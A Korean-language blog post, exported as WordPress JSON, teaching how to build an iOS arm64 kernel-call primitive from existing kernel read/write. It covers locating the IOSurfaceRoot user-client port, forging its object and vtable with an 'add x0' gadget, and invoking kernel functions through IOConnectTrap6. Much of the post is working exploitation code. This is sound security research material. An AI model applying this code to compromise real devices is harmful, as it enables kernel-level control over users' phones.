{"id":2452,"date":"2024-05-16T01:30:41","date_gmt":"2024-05-15T16:30:41","guid":{"rendered":"https:\/\/h4ck.kr\/?p=2452"},"modified":"2024-05-16T02:42:12","modified_gmt":"2024-05-15T17:42:12","slug":"ios-arm64-%ed%99%98%ea%b2%bd%ec%97%90%ec%84%9c-kernel-r-w%eb%a1%9c-kernel-call-%ea%b5%ac%ed%98%84-%ec%9d%b4%ed%95%b4%ed%95%98%ea%b8%b0-%ec%9e%91%ec%84%b1%ec%a4%91","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=2452","title":{"rendered":"iOS arm64 \ud658\uacbd\uc5d0\uc11c Kernel R\/W\ub85c kernel call \uad6c\ud604 \uc774\ud574\ud558\uae30"},"content":{"rendered":"\n

\ub514\ubc84\uae45 \uc0ac\uc6a9\ud658\uacbd:<\/h2>\n\n\n\n

iPhone 8 \/ 14.4.2<\/p>\n\n\n\n

Reference:<\/h2>\n\n\n\n
\n

https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/iokit\/Kernel\/IOUserClient.cpp#L6166<\/a>
https:\/\/conference.hitb.org\/hitbsecconf2013kul\/materials\/D2T2%20-%20Stefan%20Esser%20-%20Tales%20from%20iOS%206%20Exploitation%20and%20iOS%207%20Security%20Changes.pdf<\/a><\/p>\n<\/div><\/div>\n\n\n\n

\uc774\ud574\ud558\ub294\ub370 \uc0ac\uc6a9\ub420 Project:<\/h2>\n\n\n\n

https:\/\/gitlab.com\/alias20\/kcalltest14<\/a>
https:\/\/github.com\/jsherman212\/ktrw<\/a><\/p>\n\n\n\n

Userspace\uc5d0\uc11c IOConnectTrap6 \ud568\uc218\ub97c \ud638\ucd9c\ud558\uc5ec Kernel Call\ud558\uae30\uae4c\uc9c0 \ud638\ucd9c \uacbd\ub85c (Backtrace)<\/h2>\n\n\n\n

fleh_synchronous
https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/osfmk\/arm64\/locore.s#L614<\/a>
-> sleh_synchronous
https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/osfmk\/arm64\/sleh.c#L657<\/a>
-> handle_svc
https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/osfmk\/arm64\/sleh.c#L1642<\/a>
-> mach_syscall
https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/osfmk\/arm64\/bsd_arm64.c#L258<\/a>
-> iokit_user_client_trap
https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/iokit\/Kernel\/IOUserClient.cpp#L6198<\/a><\/strong><\/p>\n\n\n\n

kern_return_t
iokit_user_client_trap(struct iokit_user_client_trap_args *args)<\/code> \ud568\uc218\uc5d0 \uc788\ub294 <\/p>\n\n\n\n

result = (target->*func)(args->p1, args->p2, args->p3, args->p4, args->p5, args->p6);<\/code>
\uc704 \ucf54\ub4dc\uc5d0\uc11c \ucd5c\ub300 6\uac1c\uc758 \uc778\uc790\uc640 \ud568\uaed8 \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\ud574\ub0bc \uc218 \uc788\ub2e4. <\/p>\n\n\n\n

\n
kern_return_t\niokit_user_client_trap(struct iokit_user_client_trap_args *args)\n{\n    kern_return_t  result = kIOReturnBadArgument;\n    IOUserClient * userClient;\n    OSObject     * object;\n    uintptr_t      ref;\n\n...\n        if (kIOReturnSuccess == result) {\n            trap = userClient->getTargetAndTrapForIndex(&target, args->index);\n        }\n        if (trap && target) {\n            IOTrap func;\n\n            func = trap->func;\n\n            if (func) {\n                result = (target->*func)(args->p1, args->p2, args->p3, args->p4, args->p5, args->p6);\n            }\n        }\n\n        iokit_remove_connect_reference(userClient);\n    }\n\n    return result;\n}<\/pre>\n<\/div><\/div>\n\n\n\n
\ubc29\ubc95<\/h2>\n\n\n\n
\uc774\ubbf8 \ucee4\ub110 \uc77d\uae30\/\uc4f0\uae30 \uad8c\ud55c\uc744 \uac00\uc84c\ub2e4\ub294 \ud658\uacbd\uc5d0\uc11c \uc9c4\ud589\b\ud574\ubcfc \uac83\uc774\ub2e4.<\/p>\n\n\n\n
1. 
AppleKeyStore\ub098 IOSurfaceRoot \uac19\uc740 \ub4f1\ub85d\ub41c \uae30\ubcf8 IOService \uac1d\uccb4\ub97c IOServiceGetMatchingServices<\/code> \ud568\uc218\ub97c \ud1b5\ud574 \ucc3e\ub294\ub2e4.
\uadf8\ub7f0\ub2e4\uc74c, IOServiceOpen<\/code> \ud568\uc218\ub97c \ud1b5\ud574 \uadf8 \uac1d\uccb4\uc5d0 \uc5f0\uacb0\ud574\uc11c, \uc5f0\uacb0\ud55c \ud578\ub4e4\uc744 \uc758\ubbf8\ud558\ub294 mach \ud3ec\ud2b8\uc778 user_client<\/code> \ub97c \uac00\uc838\uc628\ub2e4. <\/p>\n\n\n\n
\n
uint64_t init_kcall_allocated(uint64_t _fake_vtable, uint64_t _fake_client, mach_port_t * _user_client) {\n    uint64_t add_x0_x0_0x40_ret_func = off_add_x0_x0_0x40_ret_func + get_kslide();\n\n    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IOSurfaceRoot\"));\n    if (service == IO_OBJECT_NULL) {\n        printf(\" [-] unable to find service\\n\");\n        exit(EXIT_FAILURE);\n    }\n    mach_port_t user_client;\n    kern_return_t err = IOServiceOpen(service, mach_task_self(), 0, & user_client);\n    if (err != KERN_SUCCESS) {\n        printf(\" [-] unable to get user client connection\\n\");\n        exit(EXIT_FAILURE);\n    }\n    ...\n}<\/pre>\n<\/div><\/div>\n\n\n\n
2. 
\uc544\ub798\uc640 \uac19\uc740 \ubc29\ubc95\uc73c\ub85c IPC \uacf5\uac04\ub0b4\uc5d0\uc11c \uc5d4\ud2b8\ub9ac\ub97c \ucc3e\ub294\ub2e4.
find_port \ud568\uc218\ub294 ipc_entry_lookup \ud568\uc218\uc640 \uac19\ub2e4.<\/p>\n\n\n\n
https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/osfmk\/ipc\/ipc_entry.c#L94<\/a><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n
uint64_t uc_port = find_port(user_client);\n...\n\nuint64_t find_port(mach_port_name_t port){\n\tuint64_t self_proc = proc_of_pid(getpid());\n    uint64_t task_addr = kread64(self_proc + off_p_task);\n    uint64_t itk_space = kread64(task_addr + off_task_itk_space);\n    uint64_t is_table = kread64(itk_space + off_ipc_space_is_table);\n    uint32_t port_index = port >> 8; \/\/MACH_PORT_INDEX\n    const int sizeof_ipc_entry_t = 0x18;\n    uint64_t port_addr = kread64(is_table + (port_index * sizeof_ipc_entry_t));\n    return port_addr;\n}\n\nuint64_t proc_of_pid(pid_t pid) {\n\tuint64_t proc = 0;\n\tkernRW_getKernelProc(&proc);\n    \n    while (true) {\n        if(kread32(proc + off_p_pid) == pid) {\n            return proc;\n        }\n        proc = kread64(proc + off_p_list_le_prev);\n        if(!proc) {\n            return -1;\n        }\n    }\n    \n    return 0;\n}<\/pre>\n<\/div><\/div>\n\n\n\n
3. 
IOSurfaceUserClient \ud074\ub798\uc2a4\ub97c \ucc38\uace0\ud574 fake \uac1d\uccb4\uc640 fake vtable\ub97c \ub9cc\ub4dc\ub294\ub370,
IOSurface vtable \uc911 add x0, x0, #0x40<\/code> \uac00\uc82f\uc744 \uc774\uc6a9\ud574 getTargetAndTrapForIndex<\/code> \ud568\uc218\uc5d0\uc11c \ud638\ucd9c\ub418\ub3c4\ub85d \ub9cc\ub4e0\ub2e4.<\/p>\n\n\n\n
https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/iokit\/IOKit\/IOUserClient.h#L194<\/a><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n
...\nuint64_t uc_addr = kread64(uc_port + 0x68); \/\/#define IPC_PORT_IP_KOBJECT_OFF (0x68)\t\/\/\nuint64_t uc_vtab = kread64(uc_addr); \/\/0xFFFFFFF0078666C0\nuint64_t fake_vtable = _fake_vtable;\nfor (int i = 0; i < 0x200; i++) {\n    kwrite64(fake_vtable + i * 8, kread64(uc_vtab + i * 8));\n}\nuint64_t fake_client = _fake_client;\nfor (int i = 0; i < 0x200; i++) {\n    kwrite64(fake_client + i * 8, kread64(uc_addr + i * 8));\n}\nkwrite64(fake_client, fake_vtable);\nkwrite64(uc_port + 0x68, fake_client); \/\/#define IPC_PORT_IP_KOBJECT_OFF (0x68)\nkwrite64(fake_vtable + 8 * 0xB8, add_x0_x0_0x40_ret_func);\n\n*_user_client = user_client;<\/pre>\n<\/div><\/div>\n\n\n\n
4.
IOConnectTrap6 \ud568\uc218\ub97c \uc774\uc6a9\ud558\uc5ec \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\ud574\ubcf8\ub2e4.
\ud14c\uc2a4\ud2b8\ud560 \ud568\uc218\ub294 300\uc744 \ub9ac\ud134\ud558\ub294 \ucee4\ub110 \uc8fc\uc18c\ub97c \ub300\uc0c1\uc73c\ub85c \uc9c4\ud589\ud558\uc600\ub2e4.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n
int test_kcall(mach_port_t user_client, uint64_t fake_client) {\n\tuint64_t ret_300 = kcall(user_client, fake_client, off_ret_300 + get_kslide(), 0x4141414141414141, 0x4242424242424242, 0x4343434343434343, 0x4444444444444444, 0x4545454545454545, 0x4646464646464646, 0x4747474747474747);\n\tprintf(\"ret_300: %llu\\n\", ret_300);\n\t...\n}\n\nuint64_t kcall(mach_port_t user_client, uint64_t fake_client, uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {\n    uint64_t offx20 = kread64(fake_client+0x40);\n    uint64_t offx28 = kread64(fake_client+0x48);\n    kwrite64(fake_client+0x40, x0);\n    kwrite64(fake_client+0x48, addr);\n    uint64_t returnval = IOConnectTrap6(user_client, 0, (uint64_t)(x1), (uint64_t)(x2), (uint64_t)(x3), (uint64_t)(x4), (uint64_t)(x5), (uint64_t)(x6));\n    kwrite64(fake_client+0x40, offx20);\n    kwrite64(fake_client+0x48, offx28);\n    return returnval;\n}<\/pre>\n<\/div><\/div>\n\n\n\n
\uc2e4\uc81c\ub85c \ud655\uc778\ud574\ubcf4\uba74, \ucee4\ub110 \ud568\uc218\uac00 \uc131\uacf5\uc801\uc73c\ub85c \ud638\ucd9c\ub418\uc5b4 300\uc744 \ubc18\ud658\ud558\ub294 \uac83\uc744 \uc54c \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\ubb38\uc81c\uc810?<\/h2>\n\n\n\n
\ud574\ub2f9 \ubc29\ubc95\uc73c\ub85c \ucd5c\ub300 7\uac1c\uc758 \uc778\uc790\ub9cc\ud07c \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\ud560 \uc218\ub294 \uc788\uc9c0\ub9cc,
iokit_user_client_trap<\/code> \ud568\uc218\uc758 \ub9ac\ud134\uac12\uc774 kern_return_t = int\ud615\uc774\ubbc0\ub85c
\ub9ac\ud134\uac12\uc774 8\ubc14\uc774\ud2b8 \ud615\uc2dd uint64_t\uc77c \uacbd\uc6b0, 4\ubc14\uc774\ud2b8 \ud06c\uae30\ub85c \uc798\ub824\uc11c \ubc18\ud658\ub41c\ub2e4.<\/p>\n\n\n\n
\ub530\ub77c\uc11c, \ub2e4\uc74c \uae00\uc5d0\uc11c JOP\uc744 \uc774\uc6a9\ud574\uc11c \uc774\ub7ec\ud55c \ubb38\uc81c\uc810\uc744 \ud574\uacb0\ud558\ub294 \uae00\uc744 \uc791\uc131\ud574\ubcfc \uc608\uc815\uc774\ub2e4.<\/p>\n\n\n\n
\n
https:\/\/bazad.github.io\/2018\/04\/ios-advanced-kernel-call-jop<\/a><\/p>\n\n\n\n
https:\/\/github.com\/wh1te4ever\/kfund\/blob\/wong\/kfund\/post-exploit\/kcall.m#L86<\/a><\/p>\n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"
\ub514\ubc84\uae45 \uc0ac\uc6a9\ud658\uacbd: iPhone 8 \/ 14.4.2 Reference: https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/iokit\/Kernel\/IOUserClient.cpp#L6166https:\/\/conference.hitb.org\/hitbsecconf2013kul\/materials\/D2T2%20-%20Stefan%20Esser%20-%20Tales%20from%20iOS%206%20Exploitation%20and%20iOS%207%20Security%20Changes.pdf \uc774\ud574\ud558\ub294\ub370 \uc0ac\uc6a9\ub420 Project: https:\/\/gitlab.com\/alias20\/kcalltest14https:\/\/github.com\/jsherman212\/ktrw Userspace\uc5d0\uc11c IOConnectTrap6 \ud568\uc218\ub97c \ud638\ucd9c\ud558\uc5ec Kernel Call\ud558\uae30\uae4c\uc9c0 \ud638\ucd9c \uacbd\ub85c (Backtrace) fleh_synchronous https:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/osfmk\/arm64\/locore.s#L614-> sleh_synchronoushttps:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/osfmk\/arm64\/sleh.c#L657-> handle_svchttps:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/osfmk\/arm64\/sleh.c#L1642-> mach_syscallhttps:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/osfmk\/arm64\/bsd_arm64.c#L258-> iokit_user_client_traphttps:\/\/github.com\/apple-oss-distributions\/xnu\/blob\/xnu-7195.81.3\/iokit\/Kernel\/IOUserClient.cpp#L6198 kern_return_tiokit_user_client_trap(struct iokit_user_client_trap_args *args) \ud568\uc218\uc5d0 \uc788\ub294 result = (target->*func)(args->p1, args->p2, args->p3, args->p4, args->p5, args->p6);\uc704 \ucf54\ub4dc\uc5d0\uc11c \ucd5c\ub300 6\uac1c\uc758 \uc778\uc790\uc640 \ud568\uaed8 \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\ud574\ub0bc \uc218 \uc788\ub2e4. \ubc29\ubc95 \uc774\ubbf8 \ucee4\ub110 \uc77d\uae30\/\uc4f0\uae30 \uad8c\ud55c\uc744… \ub354 \ubcf4\uae30 »iOS arm64 \ud658\uacbd\uc5d0\uc11c Kernel R\/W\ub85c kernel call \uad6c\ud604 \uc774\ud574\ud558\uae30<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[1],"tags":[11],"class_list":["post-2452","post","type-post","status-publish","format-standard","hentry","category-uncategorized","tag-ios"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2452","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2452"}],"version-history":[{"count":9,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2452\/revisions"}],"predecessor-version":[{"id":2472,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2452\/revisions\/2472"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2452"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2452"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2452"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}